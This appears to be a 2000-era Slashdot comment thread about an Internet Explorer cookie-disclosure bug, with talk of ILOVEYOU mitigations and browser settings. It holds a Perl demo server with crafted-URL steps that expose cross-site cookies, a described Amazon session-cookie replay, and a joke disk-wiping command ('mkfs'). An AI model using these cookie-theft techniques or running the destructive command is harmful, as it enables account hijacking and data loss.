tools -> options -> Security -> Zone settings -> Custom level ->

under the scripting section disable
Active scripting,
Allow Paste operations, and
Scripting of Java applets.

Press ok till you are back in outlook/IE.

then you will not be at risk for a copy-cat ILOVEYOU virus or IE cookie monsters.

(Of course you all probably did this the first day you opened outlook, right.)
------------------------------------------

PS --
Here is very nice solution to the .vbs email attachment problem.
(add .txt to the attachment making it a text file)
I'm not sure how to implement this in Exchange, though.
(from Rick Johnson off the saclug.org mailing list)

-- Andy

Re:HOWTO Close up the scripting holes

[thechink]

HowTo turn-off scripting holes in outlook/IE.

Sorry but this does not stop the ILUVYOU virus. What you suggest disables scripts in HTML formatted email and that does stop viruses like Bubbleboy for example. It DOES NOT stop scripts sent as email attachments (ala ILUVYOU, Melissa etc) BIG DIFFERENCE. Many people seem to be having trouble understanding this. Scripts in HTML email are run by the IE script engine and are controlled by the settings in Internet Options. These are the kind of scripts that can run in the preview pane automatically. Email attachment scripts are run by the Windows Scripting Host and are run outside of Outlook (or any other emailer) and have to be run by the user. The way to fix this problem is to either remove the WSH or change the default association for VBS and JS script files.

Re:HOWTO Close up the scripting holes

[xDroid]

I forgot to mention to delete wscript.exe.
sorry.

-- Andy

Re:HOWTO Close up the scripting holes

[DreamerFi]

no, no, far easier:

mkfs /dev/rwd0a

-John

Re:HOWTO Close up the scripting holes

[thechink]

That'll do it. But it might be better to use the Add/Remove Programs applet to delete WSH.

I found a good solution is to change the default action for VBS files to EDIT rather than OPEN. So when you double-click on a VBS file it will open in Notepad instead of executing. You still have the option of running the script by right clicking and selecting OPEN. This way you can keep the many benefits of the WSH and be safe too. It's a good idea to do this to JS (JavaScript) files too.

I decided...

[Anonymous+Elf]

That sigs are stupid. It doesn't always fit the tone of my message, which is often "get bent" or "trollz rule".

I did change my url to sendmoreinfo.com - so if you use me as a referrer you too may someday be up to $0.75 in BIG BIG earnings.

A potential sploit

[MoxCamel]

So does this mean I can grab somebody's Amazon.com cookie, paste it into my own cookie file, and order stuff from Amazon using "One-click"?

How do you turn off Javascript in MSIE?

[drivers]

I consider myself a pretty smart computer user, but how the hell do you turn off javascript in IE? I looked through all the settings. I even tried the Help file. I'm sure other people would like to know as well.

(I usually use IE at work and Navigator and/or Mozilla at home.)

Re:How do you turn off Javascript in MSIE?

[puppet10]

And if you want to still use Javascript at certain sites but not promiscuously ;) get IE power toys (tools) at the microsoft web site and set up the internet zone as the other people have said and set the trusted zone to allow javascript (since some sites won't work at all without javascript).

The power tools allow you to switch a site into the trusted zone just by clicking

Tools>Add to Trusted zone

and you can delete the site from your trusted list in the usual manner (Tools>InternetOptions...>security>trusted sites remove)

This makes it easier to allow cookies at Slashdot and not at Joe Website who hates all people and will screw them over any chance he gets.

ok

[Anonymous+Elf]

That makes more sense. I doubt it will happen anytime soon. Some webstores will have a clue, most won't. IT infrastructure can be even harder to change than physical infrastructure at times.

hey, it's not so bad

[/]

You can just switch to a PPC computer of some sort, run linuxppc, and run iCab under mac on linux. Of course, most of the machines that fit that description are macintoshes....

Doesn't do anything on 2000

[kdekorte]

Well I tried this CGI script out on a Win 2000 box and it doesn't do anything. Just a blank page when it loads. So I think maybe there is an over reaction to this a bit. Maybe the machines being tested didn't have the latest security patches installed...

so does iCab

[/]

available here. It also allows finer grained control, like only permitting cookies to be accepted from certain sites, besides being a superior browser.

Re:so does iCab

[mikemulvaney]

Wow, that's great! All I have to do is switch to a Macintosh! That's a great solution, thanks!

At home I use netscape under Linux, and I run a script that cleans out my cookies.txt file often. But I shouldn't have to do that, the browser should do it for me.

At work I have to use Windows for testing purposes(I work on a Sun).

Mike

yes

[mr_death]

Just ran a test with my own amazon account. With 1-click turned on in a previous session:

1. with my cookies, 1-click enabled.

2. close browser, remove amazon cookies.

3. open browser, amazon askes me to log in; no 1-click

4. close browser, put amazon cookies back

5. open browser, amazon recognizes me, 1-click enabled, no password required.

Another reason to turn off 1-click. If you don't, you might find a weird set of books on your doorstep, and one maxed-out credit card.

This Exploit Doesn't Send Wrong Cookies To Server

[spifman]

The bug is only in the client-side javascript (i.e. your other-site cookies AREN'T sent to this site). Consider this bit of perl code:

#!/usr/bin/perl -w

use strict;

use IO::Socket::INET;

my $socket = IO::Socket::INET->new(Listen => 30, LocalPort => 80, Proto => 'tcp');

$| = 1;
$socket->listen();
my $newsock = undef;
while ($newsock = $socket->accept()) {
my $getNext = 1;
my $line = '';
while ($getNext && ($line = $newsock->getline())) {
print $line;
chomp $line;
if (length $line < 2) {
$getNext = 0;
}
}
print "***done****\n";
my $foo = <<EOS;
HTTP/1.1 200 OK
Date: Thu, 11 May 2000 19:33:11 GMT
Server: Apache/1.3.0 (Unix)
Last-Modified: Thu, 11 May 2000 04:19:57 GMT
ETag: "23a5f-82-391a34ed"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/html

The value of your cookie for the domain you entered is:<br>
<script>
document.write('<b>' + document.cookie + '</b>');
</script>
EOS
$newsock->print($foo);
}

I lifted the response by telnetting to www.peacefire.org and issuing a:

GET /security/iecookies/showcookie.html?.foo.com/ HTTP/1.0

Follow these steps to see that your cookies aren't being sent:
* turn on cookies in your ie5 browser
* pick two sites that issue cookies and visit those sites to make sure the cookies are set
* run the above perl script (as root, its on port 80) on your favourite box
* set up a hosts file on your windows box for www.firstsiteyoupicked.com to point to the box your running the perl script on
* go to http://www.firstsiteyoupicked.com%2ffoo.html%3F.se condsiteyoupicked.com/
* you'll note that IE dutifuly sent the cookies from firstsiteyoupicked.com to the web server (see output of the perl script)
* you'll also note that in your IE5 window the cookies for secondsiteyoupicked.com show up.

So, I think this shows that it is a client-side only bug (but a bug nonetheless).

Use IDcide.

[borzwazie]

I'm running the IDcide plugin for IE, and I cannot retrieve any of the cookies on my browser, including /., amazon.com, doubleclick, or any of the other sites that I regularly visit that I get cookies from. Just thought you'd like to know.

What about amazon's 1 click ?

[Gog]

I never used it but if it really works in 1 click, the cookie must be the way to say user = CC number

sorry you need to check your facts

[SEAL]

Microsoft fixed the problem which allowed scripts to run without clicking them a long time ago.

Being curious, I followed your link. If you take the time to follow the next link (to Microsoft's hotfix), you'd see that it was taken care of last year.

If you were running a year old version of Linux, you wouldn't go ranting and raving about how it is full of exploits would you? No, you'd patch up to the latest.

SEAL

Microsoft has known about this for months

[Marc+Slemko]

I reported a similar bug to Microsoft on March 19th. My particular example was a URL in the form "http://10.0.0.1%20.msn.com/foo.html" which causes IE to load content from 10.0.0.1 but the Javascript code thinks it is .msn.com; this is a symptom of either the same problem or a very similar one.

However, they took their time to deal with it. I did not pressure them on it since I had more important things to worry about.

Huh?! - Ridiculous Response

[curveclimber]

You believe that disabling javascript or turning off cookies completely is an acceptable solution to this problem?

If a security hole is found next week, in something that can't be disabled, will your suggestion be: "what's the big deal don't surf for a while. I'm sure Microsoft will have a patch out soon."

While the post you're responding to did ramble, I think that a person is justified in being tired of the poor designs force fed to most of the world by Redmond.

And the idea that we shouldn't get upset, because there will *probably* be a patch to fix the problem makes me sad. With that kind of thinking out there things aren't going to get better any time soon.

The Real Bug.

[BobLenon]

Well, in attempt to see how bad this bug was ... i couldn't visit the page with IE ... i think thats an even worse bug, as IE gpf'd me.

Hmmm. ;)

ok, differentiate for me

Linux security is strengthened by people looking for problems and reporting them.

Microsoft security is to be made fun of by people looking for problems and reporting them.

And ridiculous implications that they were aware of such a hole and was using it for evil purposes just show that we can't take any kind of commentary from Jamie seriously; what is M$ bashing FUD and what is a valid opinion?

Re:ok, differentiate for me

[Tower]

I've reported a couple of security issues to M$ in the past, but they decided to ignore them... one got fixed months later after a larger client had problems due to this exposure, and got rather upset. Slow reaction time is a big key... We can fix linux, and people listen when you find things...

i'm impressed

[Frederic54]

i tried it on my win95 machine, it works... i'll try on BeOS and QNX... the script test if you have IE, so i cannot test it with BeOS/QNX, shit!
--
BeDevId 15453 - Download BeOS R5 Lite free!

An Interesting Example of Bad Security

[General_Corto]

And it's not without reason that I wrote that with a capital B.S. :)

Slightly more seriously though, it's interesting to see how many bugs and glitches are coming out of Microsoft these days, and how they're affecting our daily lives (well, the majority of PC user's lives anyways). Perhaps more interesting than this is the proof that bugs like these give us that scripting languages can be *extremely* powerful things.

I'm working on a system which embeds JavaScript (courtesy of Rhino - go Mozilla!) into something akin to an operating environment. As a result of the fact that XML and DOM are also very heavily involved, it is possible to control just about everything through scripting. This could be a huge security hole if I wanted it to be. However, Microsoft, in their wisdom, have driven a path through the minefield on my behalf, so all I have to do is tread more lightly than that behemoth

All I can say is 'thanks!'

(BTW, I'm currently using IE5. Oh, the irony.)

UNIX _IS_ effected

[bjb]

I don't know how well the tests were performed, but I just tried the test with IE 5 for Solaris and saw my cookie in all its glory.

Hmm.. I only have IE for Solaris installed on this box for just such occasions.

--

Microsoft Bugs: Not Just For Windows Anymore

[uncleFester]

This bug also appears to work well if one uses Internet Explorer on HP-UX[0]. I'd say more but I'm highly ashamed as it is. If anyone actually uses this on HP or Solaris (or Mac?) you may want to check the referred-to test pages and see what nifty little tidbits appear before you.

[0] ok, I just wanted to see how badly IExplorer sucked on unix platforms. It's really quite entertaining.

Re:Look at this ridiculous Microsoft response!

[Marc+Slemko]

Wake up and smell the cookies. Although not entirely technically accurate or complete (because you could never get such a thing past a typical reporter), he is bang on.

Yes, they have a big bug. However, name a site, any site, that makes significant use of cookies and I can almost guaranatee you that you can steal cookies for that site using "cross site scripting". And that isn't going away.

It is _CRITICAL_ that sites properly manage their use of cookies to minimize the problems from people stealing cookies in whatever manner. That is the message that needs to be coming out here because that is the _ONLY_ thing that can reduce the risk for users in the long term.

IDcide fix?

[CapnMatt]

I noticed that when running IDcide w/ IE that the bug wouldn't work. I tested it on and off, and it seems to protect against the bug.

If you don't want to turn off javascript, try using IDcide. This is the sort of thing I think it was made for.

Re:IDcide fix?

[bob|hm]

I'm seeing the same thing. I'm running 2000 pro w/ IE 5. Turning IDcide on or off didn't matter.. either way the script wasn't pulling up any of my cookies.

Asking for Trouble

[Master+Bait]

Now you've done it. First you refused to remove posts harmful to Microsoft's reputation and now you're exposing Microsoft trade secrets!

Is this Slashdot slowdown just a coincidence? I think not. Slashdot is now the victim of an official Microsoft Denial of Service Attack.

Slashdot has crossed the line and is hurting our American Company's Freedom to Innovate.

Also, this temporary Explorer snafu makes it quite clear that Microsoft doesn't steal everything from open source!

blessings,
Master Bait

Or....

[eh?]

the solution is to keep cookies disabled.... oh gee I forgot, according to slashdot cookies are good, beneficial things, and cannot be used for malicious purposes ;)

Is this really a threat?

[sonnerbob]

And here I am trying to dampen paranoia about cookies. (I love the Slashdot FAQ on cookies.)

But this bothers me and sounds similar to the bug reported at CookieCentral a long time ago. I'm trying to digest how this is different and what danger (and likelihood of appearance) this represents "in the wild".

Answers here or to me by email would be appreciated.

But what about passwords?

[invenustus]

Yahoo! keeps my password on their site in a cookie. Now any site can obtain my Yahoo! password and read my Yahoo! email. I don't want others reading my email. Do I sound like a paranoid kook for this?

More on MS Exploits

[KiboMaster]

I've known about this for quite a while. Reading cookies isn't the only thing you can do through IE. With a simple Active X script I can read/write to your hard drive. I've also seen scripts that allow a malicious person to start any program through the browser.

I'm not ragging on MS here, they aren't the only ones with exploits. Check out this link to security bugware. Exploits and fixes for all major operating systems.

Protect yourself make sure you have the latest patches to Windows 98. I'm sure you can find the links to other windows versions as well.

<Insert Linux Plug Here>
Of course the ultimate fix would be to install Linux, but I know I'm not the only one on slashdot who's preaching Linux, so I'll let people decide for themselves.
</Insert Linux Plug Here>

Has Peacefire reported this to MS?

[RayChuang]

If the folks at Peacefire did not reported these problems to Microsoft's Security team, then they are essentially doing a major disservice to the public.

Hopefully, they do know Microsoft's address for reporting security issues: secure@microsoft.com. That address is monitored 24 hours a day and the MS security folks will try to replicate the problem ASAP.

Re:Has Peacefire reported this to MS?

[Marc+Slemko]

I have no idea what they did. I know that _I_ reported a very similar issue (possibly due to the same root problem) with the exact same consequences to Microsoft two months ago and they have not yet released a fix.

Sure, I got a quick response saying they were looking into it. Sure, they said they had developed a patch. But releasing it? Well... that didn't quite happen. It is true that I did not pressure them on it since I was busy with more important things, but I shouldn't have to.

fun with Amazon's One-Click Shopping (tm)

[anonymous+cowerd]

Fun with Amazon's One-Click Shopping, or "you mean you didn't order five hundred copies of Joy of Preteen Sex?"

Doesn't Amazon's proprietary exclusive patented HANDS OFF IT'S OURS AND YOU CAN'T HAVE IT One-Click Shopping system use cookies to save buyers those arduous extra clicks? And doesn't this mean that someone using this exploit can then get your personal buyer's information? ("Your," not "my", at least until Amazon stops suing people right and left.)

Gee, I guess it's a good thing that Amazon has defended their patent so vigorously, or else customers of other companies would be equally at risk.

By the way, this is off-topic, but I figure readers would be amused. Who is to blame for the "ILOVEYOU" worm? Those funloving Filipino folks who wrote it? Microsoft, for making their scripting language so insecure and so easy to subvert? Why no. According to those geniuses in Congress, the $15-billion dollars in damages (I wonder why they didn't say "$15-trillion" or $15-quadrillion" as long as they were pulling numbers out of thin air) are due to the slackness and irresponsibility of McAfee, the anti-virus vendor. I've got to be kidding, right? Well, check it out.

Yours WDK - WKiernan@concentric.net

IE for Unix?

[slickwillie]

The story says IE for Mac and IE for Unix are not vulnerable. Since when is there IE for Unix? Which Unix? Next thing you know there will be IE for Linux.

And if Peacefire didn't report it to MS, then ...

[WillAffleck]

MSFT will sue them. Hey, if they can sue slashot, they can sue anyone.

Re:uh, I think yes

[ryanr]

Of course, you can place the orders using you Amazon Affilate Sote, giving yourself a small percentage. But I think that would make it a tad too obvious as to who the culprit was. Unless it was your friend's store. :)

oh give me a break

[SEAL]

Turning off Javascript or disabling stored cookies is an acceptable temporary solution to the problem.

If a security hole is found that can't be worked around, then yes, wait for a patch. Same thing you would do with Netscape.

Both Netscape and Microsoft IE have had security problems but Slashdot holds Microsoft to a different standard.

Witness an OLD OLD bug:

http://www.ciac.org/ciac/bulletins/i -040.shtml

Sounds familiar, doesn't it? What happened? It got fixed. And this certainly is not the only Netscape bug that has ever surfaced.

Security problems are going to be discovered. Humans make mistakes. The key is to respond to the problems swiftly, and try not to rush products out the door without proper testing. I think both MS and Netscape were guilty of the latter for a long time.

Best regards,

SEAL

thank God for the freedom to innovate

[criticalrealist]

Otherwise we'd never have such features.

2000 is affected

[robwicks]

I saw my cookie when I tried it with IE that comes with 2000. Of course, that only happened because I rebuilt the machine and forgot to reset my Internet settings. I normally don't allow cookies or scripting unless I specifically authorize the site to do so.

It's all DOJ's fault

[TopShelf]

If the Justice Department hadn't been bugging MS for the last few years, they would control the entire Internet by now, thus there would be no "hostile" users left.

All Hail the Great Leader!

easy fix

[tinus]

You can allways install a proxy, as the typical proxy doesn't understand these URLs either. They try to resolve www.blah.com%2fpage.html and that won't work, so they return an error. No need to filter things...

Happens on W2K as well

[michael.creasy]

Will test with IE5.5 as well soon.

My Webcam